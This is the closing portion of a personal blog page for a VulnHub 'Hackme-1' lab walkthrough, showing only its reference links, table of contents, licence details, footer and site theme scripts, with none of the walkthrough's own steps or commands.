<h3 id="References"><a href="#References" class="headerlink" title="References"></a>References</h3><ul>
<li><a class="link"   target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/322407.html" >【靶机渗透】HACKME: 1 <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></li>
<li><a class="link"   target="_blank" rel="noopener" href="https://www.cnblogs.com/jarwu/p/17452382.html" >Walkthrough-hackme 1 <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></li>
<li><a class="link"   target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_47372600/article/details/131163188" >hackme-1 靶机渗透详解 <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></li>
<li><a class="link"   target="_blank" rel="noopener" href="https://ithelp.ithome.com.tw/m/articles/10239776" >[Day6] - SQL injection (2) <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></li>
</ul>

        </div>

        
            <div class="post-copyright-info w-full my-8 px-2 sm:px-6 md:px-8">
                <div class="article-copyright-info-container">
    <ul>
        <li><strong>Title:</strong> Hackme-1</li>
        <li><strong>Author:</strong> kting</li>
        <li><strong>Created at
                :</strong> 2024-12-18 13:19:41</li>
        
            <li>
                <strong>Updated at
                    :</strong> 2024-12-18 13:19:58
            </li>
        
        <li>
            <strong>Link:</strong> https://redefine.ohevan.com/2024/12/18/Hackme-1/
        </li>
        <li>
            <strong>
                License:
            </strong>
            

            
                This work is licensed under <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0">CC BY-NC-SA 4.0</a>.
            
        </li>
    </ul>
</div>

            </div>
        

        
            <ul class="post-tags-box text-lg mt-1.5 flex-wrap justify-center flex md:hidden">
                
                    <li class="tag-item mx-0.5">
                        <a href="/tags/VulnHub/">#VulnHub</a>&nbsp;
                    </li>
                
            </ul>
        

        

        
            <div class="article-nav my-8 flex justify-between items-center px-2 sm:px-6 md:px-8">
                
                
                    <div class="article-next border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
                        <a class="next"
                        rel="next"
                        href="/2024/12/16/Chemistry/"
                        >
                            <span class="title flex justify-center items-center">
                                <span class="post-nav-title-item">Chemistry - Walkthrough</span>
                                <span class="post-nav-item">Next posts</span>
                            </span>
                            <span class="right arrow-icon flex justify-center items-center">
                                <i class="fa-solid fa-chevron-right"></i>
                            </span>
                        </a>
                    </div>
                
            </div>
        


        
    </div>

    
        <div class="toc-content-container">
            <div class="post-toc-wrap">
    <div class="post-toc">
        <div class="toc-title">On this page</div>
        <div class="page-title">Hackme-1</div>
        <ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#Step1-Reconnaisance"><span class="nav-text">Step1 - Reconnaisance</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Step2-Information-Gathering"><span class="nav-text">Step2 - Information Gathering</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Step3-Exploitation"><span class="nav-text">Step3 - Exploitation</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Step4-Privilege-Escalation"><span class="nav-text">Step4 - Privilege Escalation</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#References"><span class="nav-text">References</span></a></li></ol>

    </div>
</div>
        </div>
    
</div>



                

            </div>

            

        </div>

        <div class="main-content-footer">
            <footer class="footer mt-5 py-5 h-auto text-base text-third-text-color relative border-t-2 border-t-border-color">
    <div class="info-container py-3 text-center">
        
        <div class="text-center">
            &copy;
            
              <span>2022</span>
              -
            
            2024&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">kting</a>
            
                
                <p class="post-count space-x-0.5">
                    <span>
                        10 posts in total
                    </span>
                    
                </p>
            
        </div>
        
            <script data-swup-reload-script src="https://cn.vercount.one/js"></script>
            <div class="relative text-center lg:absolute lg:right-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-right">
                
                    <span id="busuanzi_container_site_uv" class="lg:!block">
                        <span class="text-sm">VISITOR COUNT</span>
                        <span id="busuanzi_value_site_uv"></span>
                    </span>
                
                
                    <span id="busuanzi_container_site_pv" class="lg:!block">
                        <span class="text-sm">TOTAL PAGE VIEWS</span>
                        <span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="relative text-center lg:absolute lg:left-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-left">
            <span class="lg:block text-sm">POWERED BY <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg class="relative top-[2px] inline-block align-baseline" version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" class="text-base" href="https://hexo.io">Hexo</a></span>
            <span class="text-sm lg:block">THEME&nbsp;<a class="text-base" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.7.1</a></span>
        </div>
        
        
            <div>
                Blog up for <span class="odometer" id="runtime_days" ></span> days <span class="odometer" id="runtime_hours"></span> hrs <span class="odometer" id="runtime_minutes"></span> Min <span class="odometer" id="runtime_seconds"></span> Sec
            </div>
        
        
            <script data-swup-reload-script>
                try {
                    function odometer_init() {
                    const elements = document.querySelectorAll('.odometer');
                    elements.forEach(el => {
                        new Odometer({
                            el,
                            format: '( ddd).dd',
                            duration: 200
                        });
                    });
                    }
                    odometer_init();
                } catch (error) {}
            </script>
        
        
        
    </div>  
</footer>
        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="article-tools-list">
        <!-- TOC aside toggle -->
        
            <li class="right-bottom-tools page-aside-toggle">
                <i class="fa-regular fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
    </ul>
</div>

        </div>
    

    <div class="right-side-tools-container">
        <div class="side-tools-container">
    <ul class="hidden-tools-list">
        <li class="right-bottom-tools tool-font-adjust-plus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-plus"></i>
        </li>

        <li class="right-bottom-tools tool-font-adjust-minus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-minus"></i>
        </li>

        <li class="right-bottom-tools tool-dark-light-toggle flex justify-center items-center">
            <i class="fa-regular fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="right-bottom-tools tool-scroll-to-bottom flex justify-center items-center">
            <i class="fa-regular fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="visible-tools-list">
        <li class="right-bottom-tools toggle-tools-list flex justify-center items-center">
            <i class="fa-regular fa-cog fa-spin"></i>
        </li>
        
            <li class="right-bottom-tools tool-scroll-to-top flex justify-center items-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
        
    </ul>
</div>

    </div>

    <div class="image-viewer-container">
    <img src="">
</div>


    

</main>


    
<script src="/js/libs/Swup.min.js"></script>

<script src="/js/libs/SwupSlideTheme.min.js"></script>

<script src="/js/libs/SwupScriptsPlugin.min.js"></script>

<script src="/js/libs/SwupProgressPlugin.min.js"></script>

<script src="/js/libs/SwupScrollPlugin.min.js"></script>

<script src="/js/libs/SwupPreloadPlugin.min.js"></script>

<script>
    const swup = new Swup({
        plugins: [
            new SwupScriptsPlugin({
                optin: true,
            }),
            new SwupProgressPlugin(),
            new SwupScrollPlugin({
                offset: 80,
            }),
            new SwupSlideTheme({
                mainElement: ".main-content-body",
            }),
            new SwupPreloadPlugin(),
        ],
        containers: ["#swup"],
    });
</script>







<script src="/js/tools/imageViewer.js" type="module"></script>

<script src="/js/utils.js" type="module"></script>

<script src="/js/main.js" type="module"></script>

<script src="/js/layouts/navbarShrink.js" type="module"></script>

<script src="/js/tools/scrollTopBottom.js" type="module"></script>

<script src="/js/tools/lightDarkSwitch.js" type="module"></script>

<script src="/js/layouts/categoryList.js" type="module"></script>





    
<script src="/js/tools/codeBlock.js" type="module"></script>




    
<script src="/js/layouts/lazyload.js" type="module"></script>




    
<script src="/js/tools/runtime.js"></script>

    
<script src="/js/libs/odometer.min.js"></script>

    
<link rel="stylesheet" href="/assets/odometer-theme-minimal.css">




  
<script src="/js/libs/Typed.min.js"></script>

  
<script src="/js/plugins/typed.js" type="module"></script>










</body>
</html>
